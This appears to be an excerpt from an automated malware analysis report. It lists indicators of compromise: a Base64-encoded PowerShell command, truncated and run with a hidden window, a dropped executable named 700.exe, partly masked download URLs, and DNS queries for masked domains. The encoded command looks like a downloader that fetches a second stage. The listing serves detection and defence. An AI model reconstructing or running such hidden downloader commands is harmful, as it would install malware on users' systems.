Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAG8AaQBjAGcAZQBvAGMAaAA9ACcAbQBpAG8AbAB5AHUAYQBiAHYAYQB1AG4AJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAEMAdQByAGAASQB0AHkAYABwAHIAYABPAFQAbwBjAG...
- %HOMEPATH%\700.exe
- %HOMEPATH%\700.exe
- http://lo###pelis.org/vizvx/JAmJ4u0RN/
- http://lo###pelis.org/cgi-sys/suspendedpage.cgi
- http://gr###cruzco.com/azk/r1tikt/
- DNS ASK mo###aimpex.com
- DNS ASK lo###pelis.org
- DNS ASK gr###cruzco.com
- DNS ASK co######esticappliances.com
- DNS ASK st####nlocked.site
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAG8AaQBjAGcAZQBvAGMAaAA9ACcAbQBpAG8AbAB5AHUAYQBiAHYAYQB1AG4AJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAEMAdQByAGAASQB0AHkAYABwAHIAYABPAFQAbwBjAG...' (with hidden window)